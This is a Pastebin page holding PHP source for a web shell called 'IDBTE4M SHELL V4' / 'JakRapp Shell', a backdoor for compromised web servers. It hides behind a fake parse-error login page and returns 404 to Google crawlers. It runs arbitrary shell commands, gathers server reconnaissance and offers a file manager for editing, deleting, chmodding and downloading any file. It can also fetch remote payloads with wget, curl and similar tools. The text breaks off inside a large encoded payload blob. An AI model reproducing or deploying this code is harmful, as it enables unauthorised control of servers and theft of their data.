EddieKidiw

IDBTE4M SHELL V4

Mar 22nd, 2016
1,456
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 165.34 KB | None | 0 0
  1. <?php
  2. /*
  3. #####################################################
  4. ##    Name    : JakRapp Shell                      ##
  5. ##    Version : v1                                 ##
  6. ##    Author  : Jaka Taruna a.k.a JakRapp          ##
  7. ##    Contact : [email protected]             ##
  8. ##    Default : jancok                             ##
  9. ##         (c) 2016 www.jakrapp.com                ##
  10. #####################################################
  11. */
  12. $auth_pass = "71a4d4cd2f30b185d707718273b17d05";
  13. $color = "#df5";
  14. $default_action = 'FilesMan';
  15. $default_use_ajax = true;
  16. $default_charset = 'Windows-1251';
  17. @define('SELF_PATH', __FILE__);
  18. @setcookie("inject", "active", time() + 3600 * 24 * 7);
  19. if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) {
  20.     header('HTTP/1.0 404 Not Found');
  21.    
  22. }
  23. @session_start();
  24. @error_reporting(0);
  25. @ini_set('error_log',NULL);
  26. @ini_set('log_errors',0);
  27. @ini_set('max_execution_time',0);
  28. @ini_set('output_buffering',0);
  29. @ini_set('display_errors', 0);
  30. @set_time_limit(0);
  31. @set_magic_quotes_runtime(0);
  32. @define('VERSION', '2.1');
  33. if( get_magic_quotes_gpc() ) {
  34.     function stripslashes_array($array) {
  35.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  36.     }
  37.     $_POST = stripslashes_array($_POST);
  38. }
  39. function printLogin() {
  40.     ?>
  41.  
  42. <br />
  43. <b>Parse error</b>:  syntax error, unexpected '}' in <b>/home/<?=$_SERVER['HTTP_HOST']?>/</b> on line <b>4366</b><br />
  44.  
  45.  
  46.     <style>
  47.         input { margin:0;background-color:#fff;border:1px solid #fff; }
  48.     </style>
  49.     <center>
  50.     <form method=post>
  51.     <input type=password name=pass>
  52.     </form></center>
  53.     <?php
  54.     exit;
  55. }
  56. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  57.     if( empty( $auth_pass ) ||
  58.         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  59.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  60.     else
  61.         printLogin();
  62.        
  63. @ini_set('log_errors',0);
  64. @ini_set('output_buffering',0);
  65. if(isset($_GET['dl']) && ($_GET['dl'] != "")){
  66.     $file = $_GET['dl'];
  67.     $filez = @file_get_contents($file);
  68.    header("Content-type: application/octet-stream");
  69.    header("Content-length: ".strlen($filez));
  70.    header("Content-disposition: attachment; filename=\"".basename($file)."\";");
  71.    echo $filez;
  72.     exit;
  73. }
  74. elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
  75.     $file = $_GET['dlgzip'];
  76.     $filez = gzencode(@file_get_contents($file));
  77.    header("Content-Type:application/x-gzip\n");
  78.    header("Content-length: ".strlen($filez));
  79.    header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
  80.    echo $filez;
  81.     exit;
  82. }
  83. // view image
  84. if(isset($_GET['img'])){
  85.         @ob_clean();
  86.         $d = magicboom($_GET['y']);
  87.         $f = $_GET['img'];
  88.         $inf = @getimagesize($d.$f);
  89.         $ext = explode($f,".");
  90.         $ext = $ext[count($ext)-1];
  91.         @header("Content-type: ".$inf["mime"]);
  92.         @header("Cache-control: public");
  93.         @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  94.         @header("Cache-control: max-age=".(60*60*24*7));  
  95.         @readfile($d.$f);
  96.         exit;
  97. }
  98.  
  99. // server software
  100. $software = getenv("SERVER_SOFTWARE");
  101. // check safemode
  102. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")  $safemode = TRUE; else $safemode = FALSE;
  103. // uname -a
  104. $system = @php_uname();
  105. // mysql
  106. function showstat($stat) {if ($stat=="on") {return "<b><font style='color:#00FF00'>ON</font></b>";}else {return "<b><font style='color:#DD4736'>OFF</font></b>";}}
  107. function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}}
  108. function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}}
  109. function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}}
  110. function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}}
  111. // check os
  112. if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
  113. else $win = FALSE;
  114. // change directory
  115. if(isset($_GET['y'])){
  116.     if(@is_dir($_GET['view'])){
  117.         $pwd = $_GET['view'];
  118.         @chdir($pwd);
  119.     }
  120.     else{
  121.         $pwd = $_GET['y'];
  122.         @chdir($pwd);
  123.     }
  124. }
  125. //hdd
  126. function convertByte($s) {
  127. if($s >= 1073741824)
  128. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  129. elseif($s >= 1048576)
  130. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  131. elseif($s >= 1024)
  132. return sprintf('%1.2f',$s / 1024 ) .' KB';
  133. else
  134. return $s .' B';
  135. }
  136.  
  137. // username, id, shell prompt and working directory
  138. if(!$win){
  139.     if(!$user = rapih(exe("whoami"))) $user = "";
  140.     if(!$id = rapih(exe("id"))) $id = "";
  141.     $prompt = $user." \$ ";
  142.     $pwd = @getcwd().DIRECTORY_SEPARATOR;
  143. }
  144. else {
  145.     $user = @get_current_user();
  146.     $id = $user;
  147.     $prompt = $user." &gt;";
  148.     $pwd = realpath(".")."\\";
  149.     // find drive letters
  150.     $v = explode("\\",$d);
  151.     $v = $v[0];
  152.     foreach (range("A","Z") as $letter)
  153.     {
  154.       $bool = @is_dir($letter.":\\");
  155.       if ($bool)
  156.       {
  157.           $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
  158.            if ($letter.":" != $v) {$letters .= $letter;}
  159.            else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
  160.            $letters .= " ]</a> ";
  161.       }  
  162.  }
  163. }
  164.  
  165. function testoracle() {
  166.     if (function_exists('ocilogon')) { return showstat("on"); }
  167.     else { return showstat("off"); }
  168.     }
  169.  
  170. function testmssql() {
  171.     if (function_exists('mssql_connect')) { return showstat("on"); }
  172.     else { return showstat("off"); }
  173.     }
  174.  
  175.  function showdisablefunctions() {
  176.     if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }
  177.     else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; }
  178.     }
  179.    
  180. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  181. else $posix = FALSE;
  182. // server ip
  183. $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
  184. // your ip ;-)
  185. $my_ip = $_SERVER['REMOTE_ADDR'];
  186. $admin_id=$_SERVER['SERVER_ADMIN'];
  187. $bindport = "13123";
  188. $bindport_pass = "b374k";
  189.  
  190. // separate the working direcotory
  191. $pwds = explode(DIRECTORY_SEPARATOR,$pwd);
  192. $pwdurl = "";
  193. for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
  194.     $pathz = "";
  195.     for($j = 0 ; $j <= $i ; $j++){
  196.         $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
  197.     }
  198.     $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
  199. }
  200.    
  201. // rename file or folder
  202. if(isset($_POST['rename'])){
  203.     $old = $_POST['oldname'];
  204.     $new = $_POST['newname'];
  205.     @rename($pwd.$old,$pwd.$new);
  206.     $file = $pwd.$new;
  207. }
  208. if(isset($_POST['chmod'])){
  209.     $name = $_POST['name'];
  210.     $value = $_POST['newvalue'];
  211. if (strlen($value)==3){
  212.     $value = 0 . "" . $value;}
  213.     @chmod($pwd.$name,octdec($value));
  214.     $file = $pwd.$name;}
  215.    
  216. if(isset($_POST['chmod_folder'])){
  217.     $name = $_POST['name'];
  218.     $value = $_POST['newvalue'];
  219. if (strlen($value)==3){
  220.     $value = 0 . "" . $value;}
  221.     @chmod($pwd.$name,octdec($value));
  222.     $file = $pwd.$name;}
  223.  
  224.  
  225. // print useful info
  226. $buff  = "Software : <b>".$software."</b><br />";
  227. $buff .= "System OS : <b>".$system."</b><br />";
  228. if($id != "") $buff .= "ID : <b>".$id."</b><br />";
  229. $buff .= "PHP Version : <b>".phpversion()."</b> on <b>".php_sapi_name()."</b><br />";
  230. $buff .= "Server ip : <b>".$server_ip."</b> <span class=\"gaya\"> | </span> Your   ip : <b>".$my_ip."</b><span class=\"gaya\"> | </span> Admin : <b>".$admin_id."</b><br />";
  231. $buff .= "Free Disk: "."<span style='color:#00FF1E'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />";
  232. if($safemode) $buff .= "Safemode: <span class=\"gaya\"><b>ON</b></span><br />";
  233. else $buff .= "Safemode: <span class=\"gaya\"><b>OFF</b></span><br />";
  234. $buff .= "Disabled Functions: ".showdisablefunctions()."<br />";
  235. $buff .= "MySQL: ".testmysql()."&nbsp;|&nbsp;MSSQL: ".testmssql()."&nbsp;|&nbsp;Oracle: ".testoracle()."&nbsp;|&nbsp;Perl: ".testperl()."&nbsp;|&nbsp;cURL: ".testcurl()."&nbsp;|&nbsp;WGet: ".testwget()."<br>";
  236. $buff .= "<font color=00ff00 ><b>".$letters."&nbsp;&gt;&nbsp;".$pwdurl."</b></font>";
  237.  
  238.  
  239.  
  240.  
  241. function rapih($text){
  242.     return trim(str_replace("<br />","",$text));
  243. }
  244.  
  245. function magicboom($text){
  246.     if (!get_magic_quotes_gpc()) {
  247.          return $text;
  248.     }
  249.     return stripslashes($text);
  250. }
  251.  
  252. function showdir($pwd,$prompt){
  253.     $fname = array();
  254.     $dname = array();
  255.     if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  256.     else $posix = FALSE;
  257.     $user = "????:????";
  258.     if($dh = @scandir($pwd)){
  259.         foreach($dh as $file){
  260.             if(is_dir($file)){
  261.                 $dname[] = $file;
  262.             }
  263.             elseif(is_file($file)){
  264.                 $fname[] = $file;
  265.             }
  266.         }
  267.     }
  268.     else{
  269.         if($dh = @opendir($pwd)){
  270.             while($file = @readdir($dh)){
  271.                 if(@is_dir($file)){
  272.                     $dname[] = $file;
  273.                 }
  274.                 elseif(@is_file($file)){
  275.                     $fname[] = $file;
  276.                 }
  277.             }
  278.             @closedir($dh);
  279.         }
  280.     }
  281.  
  282.    
  283.     sort($fname);
  284.     sort($dname);
  285.     $path = @explode(DIRECTORY_SEPARATOR,$pwd);
  286.     $tree = @sizeof($path);
  287.     $parent = "";
  288.     $buff = "
  289.     <form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
  290.    <table class=\"explore\">
  291.     <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr>
  292.  
  293.     ";
  294.     if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
  295.     else $parent = $pwd;  
  296.  
  297.     foreach($dname as $folder){
  298.         if($folder == ".") {
  299.             if(!$win && $posix){
  300.                 $name=@posix_getpwuid(@fileowner($folder));
  301.                 $group=@posix_getgrgid(@filegroup($folder));
  302.                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  303.             }
  304.             else {
  305.                 $owner = $user;
  306.             }
  307.             $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td>
  308.             <td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
  309.             <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
  310.  
  311.             <a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
  312.             <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  313.             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  314.             <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  315.             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
  316.             </form></td>
  317.            
  318.             </tr>
  319.  
  320.             ";
  321.         }
  322.         elseif($folder == "..") {
  323.             if(!$win && $posix){
  324.                 $name=@posix_getpwuid(@fileowner($folder));
  325.                 $group=@posix_getgrgid(@filegroup($folder));
  326.                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  327.             }
  328.             else {
  329.                 $owner = $user;
  330.             }
  331.             $buff .= "<tr><td><a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'>   $folder</a></td><td>LINK</td>
  332.             <td style=\"text-align:center;\">".$owner."</td>
  333.             <td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
  334.  
  335.             <td><span id=\"titik2\"><a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
  336.             <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  337.             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  338.             <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  339.             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
  340.             </form>
  341.             </td></tr>";
  342.         }
  343.         else {
  344.             if(!$win && $posix){
  345.                 $name=@posix_getpwuid(@fileowner($folder));
  346.                 $group=@posix_getgrgid(@filegroup($folder));
  347.                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  348.             }
  349.             else {
  350.                 $owner = $user;
  351.             }
  352.             $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' />     [ $folder ]</b></a>
  353.  
  354.             <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  355.             <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  356.             <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
  357.             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  358.             <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
  359.             </form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
  360.             <td><center>
  361.             <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
  362.  
  363.             <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  364.             <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  365.             <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
  366.             <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
  367.             <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  368.             onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
  369.             <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">delete</a></td></tr>";
  370.         }
  371.     }
  372.  
  373.     foreach($fname as $file){
  374.         $full = $pwd.$file;
  375.         if(!$win && $posix){
  376.             $name=@posix_getpwuid(@fileowner($folder));
  377.             $group=@posix_getgrgid(@filegroup($folder));
  378.             $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  379.         }
  380.         else {
  381.             $owner = $user;
  382.         }      
  383.         $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' />   $file</b></a>
  384.  
  385.         <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  386.         <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  387.         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
  388.         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  389.         <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
  390.         </form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
  391.         <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
  392.  
  393.         <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  394. <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  395. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
  396. <input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
  397. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
  398.         <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
  399.         <td><a href=\"?y=$pwd&amp;edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$full\">delete</a> | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gzip</a>)</td></tr>";
  400.     }
  401.     $buff .= "</table>";
  402.     return $buff;
  403. }
  404.  
  405. function ukuran($file){
  406.     if($size = @filesize($file)){
  407.         if($size <= 1024) return $size;
  408.         else{
  409.             if($size <= 1024*1024) {
  410.                 $size = @round($size / 1024,2);;
  411.                 return "$size kb";
  412.             }
  413.             else {
  414.                 $size = @round($size / 1024 / 1024,2);
  415.                 return "$size mb"; 
  416.             }
  417.         }
  418.     }
  419.     else return "???";
  420. }
  421.  
  422. function exe($cmd){
  423.     if(function_exists('system')) {
  424.         @ob_start();
  425.         @system($cmd);
  426.         $buff = @ob_get_contents();
  427.         @ob_end_clean();
  428.         return $buff;
  429.     }
  430.     elseif(function_exists('exec')) {
  431.         @exec($cmd,$results);
  432.         $buff = "";
  433.         foreach($results as $result){
  434.             $buff .= $result;
  435.         }
  436.         return $buff;
  437.     }
  438.     elseif(function_exists('passthru')) {
  439.         @ob_start();
  440.         @passthru($cmd);
  441.         $buff = @ob_get_contents();
  442.         @ob_end_clean();
  443.         return $buff;
  444.     }
  445.     elseif(function_exists('shell_exec')){
  446.         $buff = @shell_exec($cmd);
  447.         return $buff;
  448.     }
  449. }
  450.  
  451. function tulis($file,$text){
  452.     $textz = gzinflate(base64_decode($text));
  453.      if($filez = @fopen($file,"w"))
  454.      {
  455.          @fputs($filez,$textz);
  456.          @fclose($file);
  457.      }
  458. }
  459.  
  460. function ambil($link,$file) {
  461.    if($fp = @fopen($link,"r")){
  462.        while(!feof($fp)) {
  463.             $cont.= @fread($fp,1024);
  464.         }
  465.         @fclose($fp);
  466.        $fp2 = @fopen($file,"w");
  467.        @fwrite($fp2,$cont);
  468.        @fclose($fp2);
  469.    }
  470. }
  471.  
  472. function which($pr){
  473.     $path = exe("which $pr");
  474.     if(!empty($path)) { return trim($path); } else { return trim($pr); }
  475. }
  476.  
  477. function download($cmd,$url){
  478.     $namafile = basename($url);
  479.     switch($cmd) {
  480.         case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;
  481.         case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;
  482.         case 'wfread' : ambil($wurl,$namafile);break;
  483.         case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
  484.         case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
  485.         case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
  486.         case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
  487.         default: break;
  488.     }
  489.     return $namafile;
  490. }
  491.  
  492. function get_perms($file)
  493. {
  494.     if($mode=@fileperms($file)){
  495.         $perms='';
  496.         $perms .= ($mode & 00400) ? 'r' : '-';
  497.         $perms .= ($mode & 00200) ? 'w' : '-';
  498.         $perms .= ($mode & 00100) ? 'x' : '-';
  499.         $perms .= ($mode & 00040) ? 'r' : '-';
  500.         $perms .= ($mode & 00020) ? 'w' : '-';
  501.         $perms .= ($mode & 00010) ? 'x' : '-';
  502.         $perms .= ($mode & 00004) ? 'r' : '-';
  503.         $perms .= ($mode & 00002) ? 'w' : '-';
  504.         $perms .= ($mode & 00001) ? 'x' : '-';
  505.         return $perms;
  506.     }
  507.     else return "??????????";
  508. }
  509.  
  510. function clearspace($text){
  511.     return str_replace(" ","_",$text);
  512. }
  513. $wpress="7Vhbcxo5Fn6Oq/wftAqVhizQBid+wIaJY7cnTLDxAl5vKk4x6m4BGvo2ahFMtvLf90jqbppbIPsw+7L40oX0naOjcz9NOQ/5kNMo5IIF4+JJ6fz46PjICb9SXsTtwA3/FXkhE1ivj2aBI1gYoJh8pcWCSwQp/fv46MWLwihCTfRuFEY0KOIJcabUrU6Ej8sIz3EJhRy5jBaxQwKBJAiNmEcV1xcvRnPOBLAbRWWkeeplxwtjtSy/f185nwQzZ8a9YiEGyjiRwZnUQAi5PmQBE6iI9bY6Ri3HVIQRbEhoGV099Drd+8GwZw0eeneD3uVd/8bqlVFtD/6m2+l0Hzvdq8tBu3u3H//Qt3qXv1p3A1DGbfiNeR4x31ZPUPGRgYLnMboboLNq7Rzxr43TevWkhH6lzjQ06ye1E/itoRvG6Sh8NuXmvstcde/urKvBoH1rdR/gxLd78P1+Z/hPq9e++XRvycufHIz/0O0PNvEb4nQ/tq3fLntlwwmnlA+9cGwcQnLT7ljrNMo5UhPTZ+po4eQWp2LGA+0+0ntW3cULJ2MWAJhOwcXm1Ib/s5hyDs+IxKkDRWEsgD3hnCyKcgU+GA7HqNlCWFPgcroRzd1kQ7JYrnPqU9+m3Kd6exRyCuG0BMyjSjyzfYgqtd8Jx6gd5OldsLcjhiJM+IPAJhAR12eBuQSCawsnDKcsOaiWbSllOZP1aIDrb3WfnwyFn4yEvzIQftKvD3frNfi9Au25rgTdtK3OdV+6GfjWFr//+Ug5OFDONiJlPVDONiNFZ/4CyzK/Cg3qTEKELxwaCMpbF6MQsnjMvtGm8TZ6NlroilMiqIveLxooR3thSmTrwuYtfI4yPhMSMw/ZLCZQFDw2IQKe6IKgCVi3aSyrh4FisfDgFEGfRcWlTsiJlLKBgjCgRmtZnyT6wiStCzOV0V7+4c3y4dvM+wgaKELscuKDfabwrZY86+rSbFSMBQe7rYFKqNlsopvLTt8qoUSd6tv5bqL6D4kKsSBcZp4d5/1dbnhQWZMFRUMDdwdFHZ6KowYmpwF2ZgN8iVUYeEpOlTxJ6iP6mWoP3EomX1m4h2Mqhg7YFpQdFw2TCseUSXDuKvdD8Ik4HQ99IpzJkHgeYIrV17+UGs8N04AjSa7SS7TMkcSZ6Jbic+0LIrHO0NISBZs420/G5iT0qamQZjSzPeYMwRM8mS0BNGLjajSJVKYA90PmaxQvfI8FU5BHURpVRVs1dlMb5QRSQcmieBZwTYRem1IpYHEl4N+aGCu/kYtwUsEGkX93IrRLRogT+ixP0Det6O/A/PfzhHVB3lj2NLr2VJbnS5eGxqgutaJ6Lg0ty2YLtkbRDLQjAWUlm+7eFEa1aRuK1OQadnykwlTfGlda4DfTmMZpJKkCU5gkpVIG0lQFkuRQxtfvhzKBgo0NXMZG0uFJCskuID7dQSVrwxYq5VUhd3dQ3V/2+4/d3vUWStfeQXN3eWttxYPLjtjzNipBbNBYsg+AbXcb2oTPpK2mgKLPeOMKGeAPEkC6zgHSc0GGKoafTJYqlpzjJTSe0e04KA6Q2OLVUwHqu2+LeFWEnNwBc6ZLkd+cvIE0bZr+DGybNPE48wf8El3b6APYHXK8NH/qELldKW0DZabegrhPJGmgTKgtKEnckNdc3xsoQ9yrSyuAvn8KOz7yF/GfnvTrADqoopKznMlT